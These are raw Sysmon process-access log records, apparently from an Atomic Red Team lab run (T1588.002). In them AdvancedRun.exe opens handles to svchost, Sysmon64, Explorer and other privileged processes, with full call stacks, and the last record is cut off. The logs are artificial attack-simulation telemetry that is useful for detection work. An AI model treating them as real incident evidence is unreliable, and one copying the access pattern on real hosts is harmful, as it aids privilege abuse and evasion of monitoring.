17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
